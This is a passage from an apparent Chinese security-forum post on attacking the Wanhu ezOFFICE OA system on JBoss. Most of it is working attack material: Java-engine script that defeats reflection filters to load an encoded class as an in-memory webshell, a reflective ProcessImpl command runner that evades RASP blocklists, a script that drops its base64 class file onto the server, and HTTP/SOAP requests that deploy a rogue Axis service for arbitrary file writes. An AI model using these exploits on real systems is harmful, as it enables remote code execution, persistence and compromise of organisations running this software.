<span class=hljs-function>function <span class=hljs-title>removeClassCache</span><span class=hljs-params>(clazz)</span> </span>{
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName(<span class=hljs-string>"java.lang.Class"</span>)
.getResourceAsStream(<span class=hljs-string>"Class.class"</span>)
.readAllBytes(),
<span class=hljs-keyword>null</span>
);
<span class=hljs-keyword>var</span> reflectionDataField =
clazzAnonymousClass.getDeclaredField(<span class=hljs-string>"reflectionData"</span>);
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), <span class=hljs-keyword>null</span>);
}
<span class=hljs-function>function <span class=hljs-title>bypassReflectionFilter</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>var</span> reflectionClass;
<span class=hljs-keyword>try</span> {
reflectionClass = java.lang.Class.forName(
<span class=hljs-string>"jdk.internal.reflect.Reflection"</span>
);
} <span class=hljs-keyword>catch</span> (error) {
reflectionClass = java.lang.Class.forName(<span class=hljs-string>"sun.reflect.Reflection"</span>);
}
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> classBuffer = reflectionClass
.getResourceAsStream(<span class=hljs-string>"Reflection.class"</span>)
.readAllBytes();
<span class=hljs-keyword>var</span> reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
<span class=hljs-keyword>null</span>
);
<span class=hljs-keyword>var</span> fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField(<span class=hljs-string>"fieldFilterMap"</span>);
<span class=hljs-keyword>var</span> methodFilterMapField =
reflectionAnonymousClass.getDeclaredField(<span class=hljs-string>"methodFilterMap"</span>);
<span class=hljs-keyword>if</span> (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>)
.getConstructor()
.newInstance()
);
}
<span class=hljs-keyword>if</span> (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>)
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName(<span class=hljs-string>"java.lang.Class"</span>));
}
<span class=hljs-function>function <span class=hljs-title>setAccessible</span><span class=hljs-params>(accessibleObject)</span> </span>{
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> overrideField = java.lang.Class.forName(
<span class=hljs-string>"java.lang.reflect.AccessibleObject"</span>
).getDeclaredField(<span class=hljs-string>"override"</span>);
<span class=hljs-keyword>var</span> offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, <span class=hljs-keyword>true</span>);
}
<span class=hljs-function>function <span class=hljs-title>defineClass</span><span class=hljs-params>(bytes)</span> </span>{
<span class=hljs-keyword>var</span> clz = <span class=hljs-keyword>null</span>;
<span class=hljs-keyword>var</span> version = java.lang.System.getProperty(<span class=hljs-string>"java.version"</span>);
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> classLoader = <span class=hljs-keyword>new</span> java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(<span class=hljs-string>"java.net.URL"</span>),
<span class=hljs-number>0</span>
)
);
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>if</span> (version.split(<span class=hljs-string>"."</span>)[<span class=hljs-number>0</span>] &amp;gt;= <span class=hljs-number>11</span>) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
<span class=hljs-string>"java.lang.ClassLoader"</span>
).getDeclaredMethod(
<span class=hljs-string>"defineClass"</span>,
java.lang.Class.forName(<span class=hljs-string>"[B"</span>),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, <span class=hljs-number>0</span>, bytes.length);
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>var</span> protectionDomain = <span class=hljs-keyword>new</span> java.security.ProtectionDomain(
<span class=hljs-keyword>new</span> java.security.CodeSource(
<span class=hljs-keyword>null</span>,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(<span class=hljs-string>"java.security.cert.Certificate"</span>),
<span class=hljs-number>0</span>
)
),
<span class=hljs-keyword>null</span>,
classLoader,
[]
);
clz = unsafe.defineClass(
<span class=hljs-keyword>null</span>,
bytes,
<span class=hljs-number>0</span>,
bytes.length,
classLoader,
protectionDomain
);
}
} <span class=hljs-keyword>catch</span> (error) {
error.printStackTrace();
} <span class=hljs-keyword>finally</span> {
<span class=hljs-keyword>return</span> clz;
}
}
<span class=hljs-function>function <span class=hljs-title>base64DecodeToByte</span><span class=hljs-params>(str)</span> </span>{
<span class=hljs-keyword>var</span> bt;
<span class=hljs-keyword>try</span> {
bt = java.lang.Class.forName(<span class=hljs-string>"sun.misc.BASE64Decoder"</span>).newInstance().decodeBuffer(str);
} <span class=hljs-keyword>catch</span> (e) {
bt = java.lang.Class.forName(<span class=hljs-string>"java.util.Base64"</span>).newInstance().getDecoder().decode(str);
}
<span class=hljs-keyword>return</span> bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
</code></pre>
<p blockindex=33>由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可</p>
<p blockindex=34><img src="
<p blockindex=35>使用Listener组件容错高</p>
<p blockindex=36><img src=
<p blockindex=37>执行,无报错并且返回 200说明成功了</p>
<p blockindex=38><img src=
<p blockindex=39>随便找个路径连接即可</p>
<h3 blockindex=40>RASP绕过</h3>
<p blockindex=41>在命令执行的时候可能会遇到:<strong>java.lang.SecurityException: cmd execute denied !!!</strong></p>
<p blockindex=42><img src=
<p blockindex=43>即存在RASP而RASP一般是通过黑名单进行过滤的</p>
<p blockindex=44>这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用</p>
<p blockindex=45><img src="
<p blockindex=46>这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下</p>
<p blockindex=47>当调用setAccessible的时候会报错</p>
<pre blockindex=48><code class="hljs language-php">sun.org.mozilla.javascript.internal.EcmaError: <span class=hljs-built_in>TypeError</span>: Cannot call method <span class=hljs-string>"setAccessible"</span> of <span class=hljs-literal>null</span>
</code></pre>
<p blockindex=49><img src="
<p blockindex=50>在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载</p>
<pre blockindex=51><code class="hljs language-java"><span class=hljs-keyword>import</span> java.io.ByteArrayOutputStream;
<span class=hljs-keyword>import</span> java.io.InputStream;
<span class=hljs-keyword>import</span> java.lang.reflect.Method;
<span class=hljs-keyword>import</span> java.util.Map;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>Testcmd</span> </span>{
String result = <span class=hljs-string>""</span>;
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-title>Testcmd</span><span class=hljs-params>(String paramString)</span> <span class=hljs-keyword>throws</span> Exception</span>{
<span class=hljs-keyword>boolean</span> isLinux = <span class=hljs-keyword>true</span>;
String osTyp = System.getProperty(<span class=hljs-string>"os.name"</span>);
<span class=hljs-keyword>if</span> (osTyp != <span class=hljs-keyword>null</span> &amp;amp;&amp;amp; osTyp.toLowerCase().contains(<span class=hljs-string>"win"</span>)) {
isLinux = <span class=hljs-keyword>false</span>;
}
String[] cmds = isLinux ? <span class=hljs-keyword>new</span> String[]{<span class=hljs-string>"bash"</span>, <span class=hljs-string>"-c"</span>, paramString} : <span class=hljs-keyword>new</span> String[]{<span class=hljs-string>"cmd.exe"</span>, <span class=hljs-string>"/c"</span>, paramString};
Class clazz = Class.forName(<span class=hljs-string>"java.lang.ProcessImpl"</span>);
Method method = clazz.getDeclaredMethod(<span class=hljs-string>"start"</span>, String[].class, Map.class,String.class,<span class=hljs-keyword>boolean</span>.class);
method.setAccessible(<span class=hljs-keyword>true</span>);
InputStream ins = ((Process) method.invoke(<span class=hljs-keyword>null</span>,cmds,<span class=hljs-keyword>null</span>,<span class=hljs-keyword>null</span>,<span class=hljs-keyword>true</span>)).getInputStream();
ByteArrayOutputStream bos = <span class=hljs-keyword>new</span> ByteArrayOutputStream();
<span class=hljs-keyword>byte</span>[] bytes = <span class=hljs-keyword>new</span> <span class=hljs-keyword>byte</span>[<span class=hljs-number>1024</span>];
<span class=hljs-keyword>int</span> size;
<span class=hljs-keyword>while</span>((size = ins.read(bytes)) &amp;gt; <span class=hljs-number>0</span>)
bos.write(bytes,<span class=hljs-number>0</span>,size);
ins.close();
<span class=hljs-keyword>this</span>.result = bos.toString();
}
<span class=hljs-keyword>public</span> java.lang.<span class=hljs-function>String <span class=hljs-title>toString</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>return</span> <span class=hljs-keyword>this</span>.result;
}
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>main</span><span class=hljs-params>(String[] args)</span> </span>{
}
}
</code></pre>
<p blockindex=52>没有ban掉File类可以将class文件写入到系统中</p>
<pre blockindex=53><code class="hljs language-java"><span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:Moziilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
<span class=hljs-keyword>var</span> file = <span class=hljs-keyword>new</span> File(<span class=hljs-string>"../server/Testcmd.class"</span>);
<span class=hljs-keyword>var</span> fos = <span class=hljs-keyword>new</span> FileOutputStream(file);
<span class=hljs-keyword>var</span> base64Decoder = <span class=hljs-keyword>new</span> BASE64Decoder();
<span class=hljs-keyword>var</span> decodeContent = base64Decoder.decodeBuffer(<span class=hljs-string>"yv66vgAAADIAkAoAFwBPCABQCQAiAFEIAFIKAFMAVAoACQBVCABWCgAJAFcHAFgIAFkIAFoIAFsIAFwIAF0KABEAXggAXwcAYAcAMQcAYQkAYgBjCgARAGQKAGUAZgcAZwoAYgBoCgBlAGkHAGoKABoAawcAbAoAHABPCgBtAG4KABwAbwoAbQBwCgAcAHEHAHIBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxUZXN0Y21kOwEAC3BhcmFtU3RyaW5nAQAHaXNMaW51eAEAAVoBAAVvc1R5cAEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQADaW5zAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQADYm9zAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEABWJ5dGVzAQACW0IBAARzaXplAQABSQEADVN0YWNrTWFwVGFibGUHAHIHAFgHAGAHAHMHAHQHAGwHADsBAApFeGNlcHRpb25zBwB1AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBACFUZXN0Y21kLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACUAdgEAAAwAIwAkAQAHb3MubmFtZQcAdwwAeAB5DAB6AEkBAAN3aW4MAHsAfAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAdjbWQuZXhlAQACL2MBABVqYXZhLmxhbmcuUHJvY2Vzc0ltcGwMAH0AfgEABXN0YXJ0AQAPamF2YS9sYW5nL0NsYXNzAQANamF2YS91dGlsL01hcAcAfwwAgAAzDACBAIIHAHMMAIMAhAEAEGphdmEvbGFuZy9PYmplY3QMAIUAhgwAhwCIAQARamF2YS9sYW5nL1Byb2Nlc3MMAIkAigEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwB0DACLAIwMAI0AjgwAjwB2DABIAEkBAAdUZXN0Y21kAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAMoKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQAFY2xvc2UAIQAiABcAAAABAAAAIwAkAAAAAwABACUAJgACACcAAAH5AAYACwAAAOIqtwABKhICtQADBD0SBLgABU4txgARLbYABhIHtgAImQAFAz0cmQAYBr0ACVkDEgpTWQQSC1NZBStTpwAVBr0ACVkDEgxTWQQSDVNZBStTOgQSDrgADzoFGQUSEAe9ABFZAxMAElNZBBMAE1NZBRMACVNZBrIAFFO2ABU6BhkGBLYAFhkGAQe9ABdZAxkEU1kEAVNZBQFTWQYEuAAYU7YAGcAAGrYAGzoHuwAcWbcAHToIEQQAvAg6CRkHGQm2AB5ZNgqeABAZCBkJAxUKtgAfp//pGQe2ACAqGQi2ACG1AAOxAAAAAwAoAAAASgASAAAACAAEAAcACgAJAAwACgASAAsAIgAMACQADgBRABAAWAARAH0AEgCDABMAqQAUALIAFQC5ABcAxgAYANMAGgDYABsA4QAcACkAAABwAAsAAADiACoAKwAAAAAA4gAsACQAAQAMANYALQAuAAIAEgDQAC8AJAADAFEAkQAwADEABABYAIoAMgAzAAUAfQBlADQANQAGAKkAOQA2ADcABwCyADAAOAA5AAgAuQApADoAOwAJAMMAHwA8AD0ACgA+AAAAPwAF/wAkAAQHAD8HAEABBwBAAAAYUQcAEv8AaQAKBwA/BwBAAQcAQAcAEgcAQQcAQgcAQwcARAcARQAA/AAZAQBGAAAABAABAEcAAQBIAEkAAQAnAAAALwABAAEAAAAFKrQAA7AAAAACACgAAAAGAAEAAAAeACkAAAAMAAEAAAAFACoAKwAAAAkASgBLAAEAJwAAACsAAAABAAAAAbEAAAACACgAAAAGAAEAAAAiACkAAAAMAAEAAAABAEwAMQAAAAEATQAAAAIATg=="</span>);
fos.write(decodeContent, <span class=hljs-keyword>new</span> Integer(<span class=hljs-number>0</span>), <span class=hljs-keyword>new</span> Integer(decodeContent.length));
fos.close();
</code></pre>
<p blockindex=54>最后就是网上公开的poc了</p>
<p blockindex=55><img src=
<h3 blockindex=56>StringUtil任意文件写</h3>
<p blockindex=57>网上还存在一种方法:使用<code>com.whir.ezoffice.ezform.util.StringUtil</code>这个类写文件</p>
<p blockindex=58><img src=
<p blockindex=59>存在无参构造方法满足service条件</p>
<pre blockindex=60><code class="hljs language-java"><span class=hljs-function><span class=hljs-keyword>private</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>writeToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
BufferedOutputStream outStream = <span class=hljs-keyword>null</span>;
OutputStreamWriter writer = <span class=hljs-keyword>null</span>;
<span class=hljs-keyword>try</span> {
String dirPath = <span class=hljs-string>""</span>;
<span class=hljs-keyword>if</span> (fileName.lastIndexOf(<span class=hljs-string>"/"</span>) != -<span class=hljs-number>1</span>) {
dirPath = fileName.substring(<span class=hljs-number>0</span>, fileName.lastIndexOf(<span class=hljs-string>"/"</span>));
}
File dir = <span class=hljs-keyword>new</span> File(dirPath);
<span class=hljs-keyword>if</span> (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> IOException(<span class=hljs-string>"create directory '"</span> + dirPath + <span class=hljs-string>"' failed!"</span>);
}
outStream = <span class=hljs-keyword>new</span> BufferedOutputStream(<span class=hljs-keyword>new</span> FileOutputStream(fileName, <span class=hljs-keyword>true</span>));
writer = <span class=hljs-keyword>new</span> OutputStreamWriter(outStream);
writer.write(content);
} <span class=hljs-keyword>catch</span> (IOException var9) {
<span class=hljs-keyword>throw</span> var9;
} <span class=hljs-keyword>finally</span> {
<span class=hljs-keyword>if</span> (writer != <span class=hljs-keyword>null</span>) {
writer.close();
}
<span class=hljs-keyword>if</span> (outStream != <span class=hljs-keyword>null</span>) {
outStream.close();
}
}
}
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>printToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
writeToFile(fileName, content);
}
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>printlnToFile</span><span class=hljs-params>(String fileName, String content)</span> <span class=hljs-keyword>throws</span> IOException </span>{
writeToFile(fileName, content + <span class=hljs-string>"\n"</span>);
}
</code></pre>
<p blockindex=61>可以通过 printToFile 方法任意文件写,内容以及文件名均可控</p>
<pre blockindex=62><code class="hljs language-php">http:<span class=hljs-comment>//127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment</span>
</code></pre>
<p blockindex=63>网上众多的 freemarkerQa 服务均是调用的该类</p>
<pre blockindex=64><code class="hljs language-php">POST /defaultroot/./services/freemarkerQa HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
SOAPAction:
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
Content-Length: <span class=hljs-number>606</span>
&lt;soapenv:Envelope xmlns:xsi=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:util=<span class=hljs-string>"http://util.ezform.ezoffice.whir.com"</span>&gt;
&lt;soapenv:Body&gt;
&lt;util:printToFile soapenv:encodingStyle=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/encoding/"</span>&gt;
&lt;fileName xsi:type=<span class=hljs-string>"soapenc:string"</span> xmlns:soapenc=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/encoding/"</span>&gt;../server/oa/deploy/defaultroot.war/<span class=hljs-number>1</span>.txt&lt;/fileName&gt;
&lt;content xsi:type=<span class=hljs-string>"soapenc:string"</span>&gt;x&lt;/content&gt;
&lt;/util:printToFile&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=65><img src=
<p blockindex=66>验证成功</p>
<h2 blockindex=67>总结</h2>
<p blockindex=68>实战中很有意思的一个漏洞但网上的poc。。。呃呃</p>
<p blockindex=69>还可以尝试打freemarker、bsh</p>
<p blockindex=70>万户作为老牌oa还是很值得去学习研究的</p>
<p blockindex=71>参考:<br>
<a href=https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ>万户rce</a><br>
<a href=https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg>实战 | 万户GeneralWeb组合Bypass Rasp</a></p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-09-29 10:00:01
</li>
<li>阅读 ( 133 )</li>
<li>分类:<a href=https://forum.butian.net/community/Pen_Testing target=_blank rel="noopenner noreferrer">渗透测试</a>
</li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=3784 data-support_num=0> 0 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=3784> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mt-20 mb-20">
<div class=col-md-12>
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-3784 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571><a href="https://www.cnzz.com/stat/website.php?web_id=1279782571" target=_blank title=站长统计>站长统计</a></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c